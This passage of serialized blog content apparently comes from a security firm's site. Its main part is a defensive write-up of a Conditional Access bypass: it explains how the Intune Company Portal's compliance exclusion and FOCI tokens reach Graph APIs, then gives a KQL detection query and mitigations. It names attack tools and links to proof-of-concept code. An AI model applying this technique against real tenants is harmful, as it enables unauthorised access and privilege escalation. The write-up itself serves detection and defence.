wird.",[1432,20004],{":quotes":1432,":no-fullscreen":1435},[810,20006,20008],{"id":20007},"drei-jahre-in-folge-ausgezeichnet-und-das-ist-erst-der-anfang","Drei Jahre in Folge ausgezeichnet – und das ist erst der Anfang",[806,20010,816],{},[806,20012,20013],{},"Unsere erneute Auszeichnung als führender MSSP ist das Ergebnis unseres konsequenten Fokus auf innovative Sicherheitslösungen und exzellenten Service. glueckkanja kombiniert modernste Microsoft-Security-Technologien mit tiefgehender Expertise und einem klaren Ziel: Unternehmen in einer zunehmend bedrohlichen Cyberwelt optimal abzusichern. Und das direkte Kundenfeedback spricht für sich:",[806,20015,20016],{},"Unsere CSOC Customer Poll zeigt die herausragende Qualität unserer Services:",[2738,20018,20019,20022,20025],{},[2741,20020,20021],{},"87 % bewerten unsere technische Expertise auf höchstem Niveau",[2741,20023,20024],{},"94 % loben unsere 24/7-Abdeckung",[2741,20026,20027],{},"100 % sind mit der Gesamterfahrung zufrieden",[806,20029,20030],{},"Ein großes Dankeschön an Microsoft und MISA für ihr Vertrauen, die wertvolle Partnerschaft und die kontinuierliche Unterstützung. Diese Community aus führenden Security-Experten ist mehr als ein Netzwerk – sie ist ein Ökosystem, das gemeinsam Maßstäbe setzt. Ein besonderer Dank gilt auch allen MISA-Partnern: Eure Innovationen und euer Engagement treiben uns alle voran. Gemeinsam machen wir die digitale Welt sicherer.",[810,20032,20034],{"id":20033},"_23-24-25-wir-setzen-den-standard-in-microsoft-security","'23, '24, '25 – Wir setzen den Standard in Microsoft Security",[806,20036,816],{},[806,20038,20039],{},"Drei Jahre in Folge ausgezeichnet – das ist mehr als ein Erfolg, es ist ein klares Zeichen für Exzellenz. glueckkanja bleibt an der Spitze der Microsoft Sicherheitslandschaft und wird auch in Zukunft mit innovativen Lösungen und herausragender Servicequalität Maßstäbe setzen.",[806,20041,20042],{},"Wir freuen uns auf die weitere Zusammenarbeit mit Microsoft, unseren Kunden und Partnern – und auf das nächste Kapitel in unserer Erfolgsgeschichte.",{"title":863,"searchDepth":864,"depth":864,"links":20044},[20045,20046,20047],{"id":19992,"depth":864,"text":19993},{"id":20007,"depth":864,"text":20008},{"id":20033,"depth":864,"text":20034},"Nach 2023 und 2024 setzt sich unser Erfolgskurs fort: glueckkanja gehört auch 2025 zu den Spitzenreitern der Microsoft Security Excellence Awards. Als führender Managed Security Service Provider (MSSP) zählen wir erneut zu den Top-Partnern, die Microsoft für herausragende Leistungen im Bereich Cybersecurity auszeichnet. Drei aufeinanderfolgende Jahre in dieser Liga – das spricht für sich.",{"seoTitle":20050,"titleClass":873,"date":20051,"categories":20052,"blogtitlepic":19613,"socialimg":19614,"customExcerpt":20053,"keywords":19616,"hreflang":20054,"quotes":20057},"Microsoft Security Excellence Awards: glueckkanja erneut Finalist als Security MSSP des Jahres 2025","2025-03-04",[876],"glueckkanja ist erneut Finalist bei den Security MSSP of the Year Awards und damit wieder unter den weltweit führenden Managed Microsoft Security Anbietern, die im April auf der RSA Conference in San Francisco gefeiert werden. Drei Jahre in Folge gehört unser Unternehmen zu den besten Partnern im Bereich Cybersecurity – eine Erfolgsgeschichte, die ihresgleichen sucht.",[20055,20056],{"lang":953,"href":19619},{"lang":956,"href":19621},{"items":20058},[20059],{"text":20060,"name":20061,"company":20062,"alt":20061},"I'm very pleased to extend my warmest congratulations to this year's finalists for the Microsoft Security Excellence Awards. These are presented each year to recognize the outstanding achievements of our Microsoft Intelligent Security Association members as they improve customers' ability to identify and respond to security threats. Our community is made up of the most reliable and trusted security vendors worldwide. This year we received hundreds of quality submissions from partners and Microsoft stakeholders, so this year's finalists stood out in a crowd of exceptional talent. It's my pleasure to acknowledge and celebrate their work over the past year.","Maria Thomson","Director, Microsoft Intelligent Security Association","/posts/2025-03-04-mssp-2025",{"title":19980,"description":20048},"posts/2025-03-04-mssp-2025",[963,19627,371,19628],"w3sTYMrEH9K8SwKVZM13--gOSmVW42V4sP-MaJ1eU-8",{"id":20069,"title":20070,"author":20071,"body":20072,"cta":764,"description":863,"eventid":764,"extension":869,"hideInRecent":749,"layout":870,"meta":20700,"moment":20702,"navigation":508,"path":20728,"seo":20729,"stem":20730,"tags":20731,"webcast":749,"__hash__":20735},"content_de/posts/2025-01-14-compliant-device-bypass.md","Compliant Device Bypass - All you need to know!",[1185,1065,1221],{"type":803,"value":20073,"toc":20683},[20074,20078,20080,20130,20134,20136,20148,20155,20166,20172,20175,20179,20181,20185,20187,20190,20193,20253,20256,20259,20263,20265,20269,20271,20285,20292,20295,20298,20300,20303,20306,20309,20317,20328,20331,20333,20336,20340,20342,20345,20350,20354,20356,20359,20362,20365,20518,20522,20524,20527,20566,20570,20572,20579,20582,20585,20599,20602,20605,20658,20665,20669,20671,20674,20677,20680],[810,20075,20077],{"id":20076},"what-happened-so-far","What happened so far?",[806,20079,816],{},[2738,20081,20082,20103,20118,20127],{},[2741,20083,20084,20085,20090,20091,20096,20097,20102],{},"In December 2024 ",[833,20086,20089],{"href":20087,"rel":20088},"https://x.com/TEMP43487580",[1410],"Yuya Chudo"," gave his talk “",[833,20092,20095],{"href":20093,"rel":20094},"https://www.blackhat.com/eu-24/briefings/schedule/#unveiling-the-power-of-intune-leveraging-intune-for-breaking-into-your-cloud-and-on-premise-42176",[1410],"Unveiling the Power of Intune: Leveraging Intune for Breaking Into Your Cloud and On-Premise","” at the Black Hat Europe conference. In this session he showed how to abuse a hardcoded rarely known exclusion in Conditional Access (CA) for device compliance in combination with the undocumented “",[833,20098,20101],{"href":20099,"rel":20100},"https://github.com/secureworks/family-of-client-ids-research",[1410],"FOCI-Feature","” in Entra ID. In the talk he also presented the response from Microsoft MSRC (VULN-123240) that this behavior is by design and required for successful Intune Enrollment of new devices.",[2741,20104,20105,20106,20111,20112,20117],{},"Some days after the conference Sunny Chau published the proof-of-concept tool ",[833,20107,20110],{"href":20108,"rel":20109},"https://github.com/JumpsecLabs/TokenSmith",[1410],"TokenSmith"," including a ",[833,20113,20116],{"href":20114,"rel":20115},"https://labs.jumpsec.com/tokensmith-bypassing-intune-compliant-device-conditional-access/",[1410],"companion blog posts"," - what made the technique available for a broader audience.",[2741,20119,20120,20121,20126],{},"In addition, a ",[833,20122,20125],{"href":20123,"rel":20124},"https://github.com/zh54321/PoCEntraDeviceComplianceBypass/blob/main/poc_entra_compliance_bypass.ps1",[1410],"PoC written in PowerShell"," has been published.",[2741,20128,20129],{},"Since the end of December, we at glueckkanja AG have been investigating how to prevent and detect this technique. In this blog post we would like to share some of our insights regarding the attack and discuss mitigation and detection options.",[810,20131,20133],{"id":20132},"tldr","TL;DR",[806,20135,816],{},[806,20137,20138,20139,20144,20145],{},"There are some resources with a built-in exclusion to specific Grant Controls/Conditions in Conditional Access to solve certain problems. One of them is the exclusion of the Company Portal App for Device Compliance to solve the chicken-egg-problem to get devices enrolled in Intune before they are considered compliant. This behavior is ",[833,20140,20143],{"href":20141,"rel":20142},"https://learn.microsoft.com/en-us/entra/identity/conditional-access/policy-alt-all-users-compliant-hybrid-or-mfa#:~:text=You%20can%20enroll,Company%20Portal%20application",[1410],"documented here",".\n",[1736,20146,20147],{},"This means you can get access and refresh token for this app from an unmanaged device even if a CA policy is enforcing Device Compliance for “All resources”.",[806,20149,20150,20154],{},[1449,20151],{"alt":20152,"src":20153},"image.png","https://res.cloudinary.com/c4a8/image/upload/blog/pics/company-portal-ca-bypass-02.png","{: .post__screenshot}",[806,20156,20157,20158,20162,20163],{},"Microsoft has implemented a feature called Family of Client IDs (FOCI) which allows a group of Microsoft OAuth client applications to obtain access tokens as any other client in the family using their refresh token. A behavior otherwise not allowed in the OAuth2 standard. Read the ",[833,20159,20161],{"href":20099,"rel":20160},[1410],"original work of Secureworks"," for more details.\n",[1736,20164,20165],{},"Since the Company Portal App is a “family member” the requested Refresh Tokens for it can be used to get tokens for other apps in the family.",[806,20167,20168,20169],{},"The FOCI feature is limited and the consent between the client id and the resource must be explicitly configured and granted. In the case of the Company Portal App this consent has been granted, among others, for access to Microsoft Graph using a restricted scope and to the Azure AD Graph API with the permission of the current user.\n",[1736,20170,20171],{},"This means a Company Portal refresh token can be used to obtain e.g. Azure AD Graph API access tokens with the scope user_impersonation, allowing us to do a lot of things with eg. AADInternals or ROADrecon",[806,20173,20174],{},"To execute the attack, the attacker requires either valid credentials of the victim as well as the ability to perform MFA if this is required by Conditional Access or a valid refresh token.",[810,20176,20178],{"id":20177},"what-risk-and-blast-radius-exists","What risk and blast radius exists?",[806,20180,816],{},[1671,20182,20184],{"id":20183},"which-of-the-possible-resources-scopes-are-affected-from-the-compliance-exclusion","Which of the possible resources (scopes) are affected from the compliance exclusion?",[806,20186,1536],{},[806,20188,20189],{},"The Attacker has the option to request tokens for another FOCI application as already described before. However, Microsoft has implemented a bypass for the device compliance requirements only for accessing tokens to certain resource applications various API permission scope. In particular, the following delegated API permissions are sensitive and of interest to attackers:",[3604,20191,20192],{},"\ntable {\n font-family: arial, sans-serif;\n border-collapse: collapse;\n width: 100%;\n}\n\ntd, th {\n border: 1px solid #dddddd;\n text-align: left;\n padding: 8px;\n}\n\ntr:nth-child(even) {\n background-color: #dddddd;\n}\n",[1902,20194,20195,20208],{},[1907,20196,20197],{},[1911,20198,20199,20202,20205],{},[1915,20200,20201],{},"Resource Application",[1915,20203,20204],{},"Application Id",[1915,20206,20207],{},"Delegated Permission Scope",[1923,20209,20210,20221,20232,20243],{},[1911,20211,20212,20215,20218],{},[1928,20213,20214],{},"AADGraph",[1928,20216,20217],{},"00000002-0000-0000-c000-000000000000",[1928,20219,20220],{},"user_impersonation",[1911,20222,20223,20226,20229],{},[1928,20224,20225],{},"Microsoft Graph API",[1928,20227,20228],{},"00000003-0000-0000-c000-000000000000",[1928,20230,20231],{},"“email\", \"openid\", \"profile\",\"Device.Read.All\", \"DeviceManagementConfiguration.Read.All\", \"DeviceManagementConfiguration.ReadWrite.All\", \"ServicePrincipalEndpoint.Read.All\", \"User.Read”",[1911,20233,20234,20237,20240],{},[1928,20235,20236],{},"Device Registration Service",[1928,20238,20239],{},"01cb2876-7ebd-4aa4-9cc9-d28bd4d359a9",[1928,20241,20242],{},"adrs_access",[1911,20244,20245,20248,20251],{},[1928,20246,20247],{},"Windows Azure Service Management API",[1928,20249,20250],{},"797f4846-ba00-4fd7-ba43-dac1f8f63013",[1928,20252,20220],{},[806,20254,20255],{},"Since the granted permissions are not for the application itself, the impact depends on the privileges of the caller (user account) and which delegated permission scopes are authorized to execute API calls on the scope.",[806,20257,20258],{},"Let us have a closer look at the criticality of the shown delegated permission scope and potential authorization to call sensitive APIs?",[810,20260,20262],{"id":20261},"which-privileges-and-delegated-scope-are-critical","Which privileges and delegated scope are critical?",[806,20264,816],{},[1671,20266,20268],{"id":20267},"azure-ad-graph-api","Azure AD Graph API",[806,20270,1536],{},[806,20272,20273,20274,20279,20280,8072],{},"The legacy programmatic interface offers many APIs to manage directory settings and objects in Entra ID (Azure AD). This includes Conditional Access policies, directory roles, CRUD on groups and devices and operations on the signed-in user, such as change password. A full list of all supported operations can be found in the ",[833,20275,20278],{"href":20276,"rel":20277},"https://learn.microsoft.com/en-us/previous-versions/azure/ad/graph/api/api-catalog",[1410],"Azure AD Graph API reference",". This API will be fully retired on June 30, 2025 (based on ",[833,20281,20284],{"href":20282,"rel":20283},"https://learn.microsoft.com/en-us/graph/migrate-azure-ad-graph-overview",[1410],"Microsoft latest announcements",[806,20286,20287,20288,20291],{},"The assigned delegated scope “user_impersonation” allows the application (in this case, Company Portal) to act on behalf of the user. So, every permission that the signed-in user has to an Entra object, scope or directory-level can be used as authorization in the API calls. The user might be the owner of an Entra ID object (application, group, or other objects), or they might be assigned permissions through Entra ID role assignments. ",[1736,20289,20290],{},"In the case of active high privileged role assignments, this would allow the attacker to modify objects or compromise the tenant",". At least, even without any privileges, default user permissions can be used for extensive reconnaissance and enumeration of directory objects in the tenant.",[806,20293,20294],{},"Therefore, the scenarios and impact to abuse the Azure AD Graph API depends on the active or permanent assigned privileges of the affected user. APIs to access Microsoft 365 services (e.g., for exfiltration of OneDrive) are not included in Azure AD Graph.",[1671,20296,20225],{"id":20297},"microsoft-graph-api",[806,20299,1536],{},[806,20301,20302],{},"In comparison to Azure AD Graph, the delegated scope to Microsoft Graph API is restricted to a certain scope. Alongside OpenID scopes (openid, email, profile) and basic read operations on behalf of the user (ServicePrincipalEndpoint.Read.All, User.Read).",[806,20304,20305],{},"List and read of all device objects can be achieved by calling “device” endpoint in Microsoft Graph with default permissions by using “Device.Read.All\". This could help attackers to gain insights of device objects.",[806,20307,20308],{},"In case of a compromised user with assignment to “Intune Administrator” or any delegation in Microsoft Intune RBAC, the following granted delegated API permission should be considered problematic:",[2738,20310,20311,20314],{},[2741,20312,20313],{},"”DeviceManagementConfiguration.Read.All”",[2741,20315,20316],{},"“DeviceManagementConfiguration.ReadWrite.All”",[806,20318,20319],{},[1736,20320,20321,20322,20327],{},"Those delegated permissions allow CRUD operations, for example on Device Compliance and Configuration Policies but also deployment of ",[833,20323,20326],{"href":20324,"rel":20325},"https://learn.microsoft.com/en-us/graph/api/intune-shared-devicemanagementscript-create?view=graph-rest-beta",[1410],"Management Scripts"," for further malicious activity on target devices.",[1671,20329,20236],{"id":20330},"device-registration-service",[806,20332,1536],{},[806,20334,20335],{},"With this permission the attacker is able to join or register a device to Entra ID. In turn this would allow them to even enroll the device in Intune and depending on the Intune configuration get a valid and compliant to device to access even more protected services.",[1671,20337,20339],{"id":20338},"other-foci-applications","Other FOCI applications",[806,20341,1536],{},[806,20343,20344],{},"Requesting access to other privileged interfaces, for example Azure Resource Manager API is in scope of FOCI and interests of the attacker well. However, this resource is still protected and not bypassed to the Conditional access grant control “compliant device”.",[806,20346,20347],{},[1449,20348],{"alt":20152,"src":20349},"https://res.cloudinary.com/c4a8/image/upload/blog/pics/company-portal-ca-bypass-03.png",[810,20351,20353],{"id":20352},"can-we-detect-this-attack-technique","Can we detect this attack technique?",[806,20355,816],{},[806,20357,20358],{},"As described above, the greatest risk comes from access to MS Graph and Azure AD Graph.",[806,20360,20361],{},"Since the application ID of the Microsoft Intune Company Portal App is always used in this case, the main task for creating a detection is to exclude legitimate use by e.g. device registrations, which according to our observation consists of which resources are accessed first in a session → in case of an attack usually MS Graph or Azure AD Graph.",[806,20363,20364],{},"Here is a working detection that we tested in several environments different sizes:",[1541,20366,20368,20369,20371,20372,20376,20377,20381,20385,2025,20387,20389,2025,20393,20371,20395,20397,20398,2025,20402,20404,2025,20407,20371,20409,20411,20412,20414,2025,20417,20371,20419,20421,20422,2887,20425,2289,20428,9798,20431,20371,20433,20436,20437,20439,2025,20442,20371,20444,2887,20447,20449,20450,20452,20453,20455,20456,2025,20458,20452,20460,20463,20464,20467,20468,20470,20471,20436,20474,20476,2025,20479,20371,20481,20483,20484,20371,20486,20488,20489,2025,20491,20493,2025,20495,20371,20497,20397,20499,2025,20501,20503,2025,20506,20371,20508,20421,20510,2887,20512,2289,20514,9798,20516],{"style":20367},"background-color:#000000; font-family: 'Source Code Pro', 'Courier New', monospace; padding: 15px; color: #ffffff","\nAADSignInEventsBeta ",[2016,20370],{},"\n| ",[1588,20373,20375],{"style":20374},"color: #569CD6;","where"," Timestamp > ",[1588,20378,20380],{"style":20379},"color: #E6DB74;","ago(",[1588,20382,20384],{"style":20383},"color: #A6E22E;","7d",[1588,20386,2772],{"style":20379},[2016,20388],{},[1588,20390,20392],{"style":20391},"color: #75715E;","// Access to Microsoft Intune Company Portal",[2016,20394],{},[1588,20396,20375],{"style":20374}," ApplicationId == ",[1588,20399,20401],{"style":20400},"color: #D69D85;","@\"9ba1a5c7-f17a-4de9-a1f1-6178c8d51223\"",[2016,20403],{},[1588,20405,20406],{"style":20391},"// From non joined/registered device",[2016,20408],{},[1588,20410,20375],{"style":20374}," isempty(AadDeviceId) ",[2016,20413],{},[1588,20415,20416],{"style":20391},"// Used to access resource Microsoft Graph or Windows Azure Active Directory",[2016,20418],{},[1588,20420,20375],{"style":20374}," ResourceId ",[1588,20423,20424],{"style":20374},"in",[1588,20426,20427],{"style":20400},"\"00000002-0000-0000-c000-000000000000\"",[1588,20429,20430],{"style":20400},"\"00000003-0000-0000-c000-000000000000\"",[2016,20432],{},[1588,20434,20435],{"style":20374},"summarize by"," SessionId ",[2016,20438],{},[1588,20440,20441],{"style":20391},"// Find the initial logon event based on the session Id",[2016,20443],{},[1588,20445,20446],{"style":20374},"join kind=inner",[2016,20448],{},"\n    AADSignInEventsBeta ",[2016,20451],{},"\n    | ",[1588,20454,20375],{"style":20374}," ErrorCode == ",[1588,20457,2292],{"style":20383},[2016,20459],{},[1588,20461,20462],{"style":20374},"summarize arg_min(","Timestamp, *",[1588,20465,20466],{"style":20374},") by"," SessionId)",[2016,20469],{},"\n    ",[1588,20472,20473],{"style":20374},"on",[2016,20475],{},[1588,20477,20478],{"style":20391},"// Ignore trusted and managed devices",[2016,20480],{},[1588,20482,20375],{"style":20374}," isempty(DeviceTrustType) ",[2016,20485],{},[1588,20487,20375],{"style":20374}," IsManaged != ",[1588,20490,2322],{"style":20383},[2016,20492],{},[1588,20494,20392],{"style":20391},[2016,20496],{},[1588,20498,20375],{"style":20374},[1588,20500,20401],{"style":20400},[2016,20502],{},[1588,20504,20505],{"style":20391},"// when the first requested resource is Microsoft Graph or Windows Azure Active Directory",[2016,20507],{},[1588,20509,20375],{"style":20374},[1588,20511,20424],{"style":20374},[1588,20513,20427],{"style":20400},[1588,20515,20430],{"style":20400},[2016,20517],{},[810,20519,20521],{"id":20520},"how-should-we-respond-when-we-detect-suspicious-activities","How should we respond when we detect suspicious activities?",[806,20523,816],{},[806,20525,20526],{},"Initialize your incident response process using a defined playbook which contains:",[2738,20528,20529,20549,20557,20560,20563],{},[2741,20530,20531,20532],{},"Hunting for suspicious or anomalous activity by the compromised user\n",[2738,20533,20534,20540,20543,20546],{},[2741,20535,20536,20537],{},"Summary of non-interactive sign-in to Resource Applications including IP addresses and UserAgents based on ",[1524,20538,20539],{},"sessionId",[2741,20541,20542],{},"Check if Microsoft Entra Audit Logs shown critical operations by the user or IP addresses (e.g., added credentials to owned app registrations)",[2741,20544,20545],{},"Identify if the user has registered devices in the affected session",[2741,20547,20548],{},"Check Intune audit logs for operations by application “Company Portal” and the affected user",[2741,20550,20551,20552],{},"Hunting for related alerts by the impacted entities\n",[2738,20553,20554],{},[2741,20555,20556],{},"Lookup for entities in the AlertEvidence table to identify other alerts based on SessionId, IP Addresses and User",[2741,20558,20559],{},"Identify criticality of the user (by privileges) in Exposure Management",[2741,20561,20562],{},"Review of hunting results and verify if the action was legitimate as part of a device enrollment.",[2741,20564,20565],{},"Identity the initial access vector and reset the users’ credentials and when needed devices.",[810,20567,20569],{"id":20568},"can-we-mitigate-the-attack","Can we mitigate the attack?",[806,20571,816],{},[806,20573,20574,20575,20578],{},"Since the configured exclusion is required for Intune enrollment, ",[1736,20576,20577],{},"there is no mitigation that would not break other parts of Microsoft 365",". Access to the Azure AD Graph resource cannot be scoped or blocked directly. Any Conditional Access policy using “Block” as grant control will prevent access but might have other implications.",[806,20580,20581],{},"But for mitigation it is crucial to understand that this Conditional Access bypass is not a complete attack. It is a technique which as a step allows a range of attacks.",[806,20583,20584],{},"An attack path could be",[4351,20586,20587,20590,20593,20596],{},[2741,20588,20589],{},"Account Compromise via Phishing and AiTM",[2741,20591,20592],{},"Conditional Access Bypass",[2741,20594,20595],{},"Reconnaissance using e.g. ROADrecon, GraphRunner or AADInternals",[2741,20597,20598],{},"Lateral Movement, Privilege Escalation or Persistence through a newly registered device enrolled in Intune",[806,20600,20601],{},"Since we are not able to mitigate the Conditional Access bypass without breaking Intune enrollment, it is more than reasonable to implement mitigations at the other steps off the attack path and also implement reasonable detections.",[806,20603,20604],{},"To reduce the probability and impact we suggest increasing the strengths of other controls and implement the following soon:",[2738,20606,20607,20613,20619,20625,20631,20646,20652],{},[2741,20608,20609,20612],{},[1736,20610,20611],{},"Enforce MFA for “All Users” and “All Cloud Apps” through Conditional Access."," If you only enforce Device Compliance Single Factor Authentication is enough with this technique.",[2741,20614,20615,20618],{},[1736,20616,20617],{},"Do not use Device Compliance or MFA in your rulesets, always enforce both!"," Using OR would never restrict all access to compliant device, because an access token with MFA in scope would be sufficient to access the tenant.",[2741,20620,20621,20624],{},[1736,20622,20623],{},"Restrict Security Information Registration to Compliant Devices, Phishing Resistant Authentication or TAP."," In our tests we did not manage to bypass Device Compliance for the Security Info Registration.",[2741,20626,20627,20630],{},[1736,20628,20629],{},"Require Phishing Resistant Authentication or TAP for Join or Register Devices"," Without it will be possible to register a device with e.g. AADInternals and this technique.",[2741,20632,20633,20636,20637],{},[1736,20634,20635],{},"Require MFA and “Sign-in frequency every time” for Microsoft Intune Enrollment"," This limits the timespan an attacker could use fresh credentials to enroll a new device to Intune.\n",[3587,20638,20639],{},[806,20640,20641,20642,20645],{},"🚧\n",[1736,20643,20644],{},"Caution: Sign-in frequency every time = Every five minutes","\nMicrosoft factors for five minutes of clock skew when “every time” is selected in a conditional access policy, so that users do not get prompted more often than once every five minutes.",[2741,20647,20648,20651],{},[1736,20649,20650],{},"Block personally owned devices in the Intune Enrollment restrictions."," Without these restrictions, an attacker could enroll a new device and gain additional foothold.",[2741,20653,20654,20657],{},[1736,20655,20656],{},"Set device compliance to fail when no compliance policy is assigned to a device in Intune."," By default each device is considered compliant, even if no policy is actually applied. Change this and make a device compliance policy a requirement.",[806,20659,20660,20661,2786],{},"In the long run, we would like to encourage you to invest in rollout password-less, phishing-resistant authentication like Windows Hello for Business and Passkeys (incl. Platform Credentials by using macOS Platform SSO). This will allow you to subsequently enforce phishing resistant authentication and block AiTM attacks. Instead of password allow the usage of Temporary Access Pass (TAP) for limited time and scenarios, e.g. onboarding new devices or employees. To support the usage of TAPs for various use cases we have built ",[833,20662,442],{"href":20663,"rel":20664},"https://myworkid.cloud/",[1410],[810,20666,20668],{"id":20667},"conclusion","Conclusion",[806,20670,816],{},[806,20672,20673],{},"Conditional Access as the Zero Trust engine for Entra ID is, in itself, already complicated. Added built-in exclusions in the backend of Entra by Microsoft make it even harder for many to understand the impact of policies and protections. Still the idea of Zero Trust and defense in depth holds up.",[806,20675,20676],{},"The device compliance policy prevents most AiTM attacks and multi-factor authentication makes it harder for any attacker to abuse leaked or otherwise compromised credentials.",[806,20678,20679],{},"All these security measures must be used together and not one instead of the other. This ensures a secure environment, even if one of the defenses is tampered with or overcome.",[806,20681,20682],{},"We strongly recommend deploying the provided detection in Microsoft Defender XDR to ensure detection of potential abuse. Make sure your SOC is prepared to investigate those incidents and provide them with the necessary playbooks.",{"title":863,"searchDepth":864,"depth":864,"links":20684},[20685,20686,20687,20690,20696,20697,20698,20699],{"id":20076,"depth":864,"text":20077},{"id":20132,"depth":864,"text":20133},{"id":20177,"depth":864,"text":20178,"children":20688},[20689],{"id":20183,"depth":1814,"text":20184},{"id":20261,"depth":864,"text":20262,"children":20691},[20692,20693,20694,20695],{"id":20267,"depth":1814,"text":20268},{"id":20297,"depth":1814,"text":20225},{"id":20330,"depth":1814,"text":20236},{"id":20338,"depth":1814,"text":20339},{"id":20352,"depth":864,"text":20353},{"id":20520,"depth":864,"text":20521},{"id":20568,"depth":864,"text":20569},{"id":20667,"depth":864,"text":20668},{"seoTitle":20701,"titleClass":873,"date":20702,"categories":20703,"blogtitlepic":20704,"socialimg":20705,"customExcerpt":20706,"keywords":20707,"contactInContent":20708,"scripts":20727},"Compliant Device Bypass in Microsoft Intune – Detection, Response & Mitigation","2025-01-14",[371],"header-company-portal-ca-bypass","/blog/heads/header-company-portal-ca-bypass.png","In this blog post, glueckkanja's MVP Fabian Bader, Chris Brumm and Thomas Naunheim gather details about the Compliant Device Bypass in Microsoft Intune Company Portal. After additional research, they have found an approach to detect and respond to the potential threat. You'll also find guidance on Conditional Access to reduce the attack surface and details on the blast radius.","Compliant Device Bypass, Microsoft Intune, Conditional Access, Entra ID, Intune Company Portal, device compliance, CA exclusion, TokenSmith PoC, cloud security, PowerShell PoC, Fabian Bader, Christopher Brumm, Thomas Naunheim, security threat, Black Hat Europe, Intune Enrollment, MSRC response, attack detection, threat mitigation, cloud compliance, FOCI feature",{"quote":749,"infos":20709},{"bgColor":19000,"color":884,"boxBgColor":19001,"boxColor":19002,"headline":19003,"subline":20710,"level":810,"textStyling":887,"flush":888,"person":20711,"form":20715},"Would you like to learn more about the Compliant Device Bypass and how to detect and mitigate it effectively? Our experts are ready to walk you through our findings and support you with proven strategies for enhanced security. We look forward to connecting with you!",{"image":19006,"cloudinary":508,"alt":19007,"name":19007,"detailsHeader":19008,"details":20712},[20713,20714],{"text":762,"href":898,"details":899,"icon":900},{"text":763,"href":902,"icon":903},{"ctaText":19013,"cta":20716,"method":870,"action":908,"fields":20717},{"skin":907},[20718,20719,20720,20721,20722,20723,20725,20726],{"type":911,"id":912,"value":913},{"label":915,"type":916,"id":917,"required":508,"requiredMsg":19018},{"label":19020,"type":916,"id":612,"required":508,"requiredMsg":19021},{"label":19023,"type":924,"id":924,"required":508,"requiredMsg":19024},{"label":19026,"type":933,"id":934,"required":508,"requiredMsg":19027},{"type":911,"id":942,"value":20724},"Request Global Secure Access",{"type":911,"id":945,"value":946},{"type":911,"id":948},{"slick":508,"form":508},"/posts/2025-01-14-compliant-device-bypass",{"title":20070,"description":863},"posts/2025-01-14-compliant-device-bypass",[371,20732,20733,20734,432],"Entra","Conditional Access","ITDR","gqWV4sCyGgD86VtXJ87XTuZkSiHyfITlMCzYMwmcT4A",{"id":20737,"title":20738,"author":20739,"body":20740,"cta":764,"description":863,"eventid":764,"extension":869,"hideInRecent":749,"layout":870,"meta":21231,"moment":21233,"navigation":508,"path":21267,"seo":21268,"stem":21269,"tags":21270,"webcast":749,"__hash__":21273},"content_de/posts/2025-01-09-microsoft-365-copilot.md","Microsoft 365 Copilot sicher einführen: Das müsst ihr wissen",[1216],{"type":803,"value":20741,"toc":21201},[20742,20746,20748,20780,20783,20785,20788,20792,20794,20797,20800,20804,20806,20809,20812,20816,20818,20821,20825,20827,20830,20833,20835,20838,20842,20844,20847,20850,20856,20859,20862,20864,20867,20873,20906,20909,20911,20914,20917,20919,20965,20968,20970,20973,20981,20984,20986,20989,20993,20995,20998,21001,21005,21007,21010,21015,21018,21021,21025,21027,21030,21033,21035,21038,21076,21079,21081,21084,21090,21093,21096,21098,21101,21109,21112,21115,21117,21120,21123,21126,21170,21173,21175,21178,21181],[810,20743,20745],{"id":20744},"übersicht","Übersicht",[806,20747,816],{},[2738,20749,20750,20756,20762,20768,20774],{},[2741,20751,20752],{},[833,20753,20755],{"href":20754},"#oversharing-kennen--kontrollieren","Oversharing kennen & kontrollieren",[2741,20757,20758],{},[833,20759,20761],{"href":20760},"#sharepoint-advanced-management","SharePoint Advanced Management",[2741,20763,20764],{},[833,20765,20767],{"href":20766},"#grundlegende-sicherheit-im-tenant-herstellen","Grundlegende Sicherheit im Tenant herstellen",[2741,20769,20770],{},[833,20771,20773],{"href":20772},"#aktualisierung-der-office-applikationen","Aktualisierung der Office-Applikationen",[2741,20775,20776],{},[833,20777,20779],{"href":20778},"#datenschutz--datensicherheit","Datenschutz & Datensicherheit",[810,20781,20755],{"id":20782},"oversharing-kennen-kontrollieren",[806,20784,816],{},[806,20786,20787],{},"Der Begriff \"Oversharing\" wird in den letzten Monaten oft verwendet, doch was bedeutet er im Zusammenhang mit der Vorbereitung auf Microsoft 365 und der Einführung von Copilot?",[1671,20789,20791],{"id":20790},"was-ist-oversharing","Was ist Oversharing?",[806,20793,1536],{},[806,20795,20796],{},"Oversharing, oder das \"Überteilen\" von Daten, bedeutet, dass Personen auf Daten zugreifen können, auf die sie eigentlich keinen Zugriff haben sollten. Dieses Problem tritt häufig aufgrund mangelnder Datenkontrolle auf. Ein IT-Magazin titelte im November 2024: \"Copilot lässt Mitarbeiter die E-Mails ihrer Chefs lesen\". Diese Aussage ist jedoch faktisch falsch. Derartige Vorfälle sind nicht auf Copilot zurückzuführen, sondern auf unzureichende Datenkontrollen und Oversharing.",[806,20798,20799],{},"Der Microsoft Copilot basiert auf den Daten, die dem Nutzer zur Verfügung stehen. Er erhält keine zusätzlichen Berechtigungen, sondern verwendet einen Index, der es erleichtert, auf Informationen zu stoßen oder Dinge zu finden, von denen man nicht wusste, dass man darauf Zugriff hat.",[810,20801,20803],{"id":20802},"arten-von-microsoft-teams","Arten von Microsoft Teams",[806,20805,816],{},[806,20807,20808],{},"Wir unterscheiden bei Teams zwischen privaten und öffentlichen Teams. Befinden sich sensible oder geschützte Dokumente in öffentlichen Teams, können diese von allen Mitarbeitenden im Unternehmen eingesehen und somit auch von Copilot indexiert werden.",[806,20810,20811],{},"Es spricht grundsätzlich nichts dagegen, weiterhin auch öffentliche Teams zu nutzen – sogar viele davon. Wichtig ist jedoch sicherzustellen, dass die darin geteilten Informationen und Dokumente für alle zugänglich sein dürfen.",[1671,20813,20815],{"id":20814},"empfehlung","Empfehlung",[806,20817,1536],{},[806,20819,20820],{},"Überprüft regelmäßig, welche Daten in euren Teams abgelegt sind, und räumt gegebenenfalls auf. Häufig handelt es sich um Altlasten, die beispielsweise aus der Einführungszeit von Microsoft Teams stammen und im Laufe der Zeit gewachsen sind.",[810,20822,20824],{"id":20823},"zugriff-auf-daten-in-sharepoint-online","Zugriff auf Daten in SharePoint Online",[806,20826,816],{},[806,20828,20829],{},"Die Dokumente, die in öffentlichen Teams abgelegt sind, befinden sich bekanntermaßen auch in SharePoint. Neben den Team-Sites in SharePoint gibt es jedoch auch eigenständige SharePoint-Sites und -Bibliotheken. Häufig haben auch hier alle oder viele Mitarbeitende 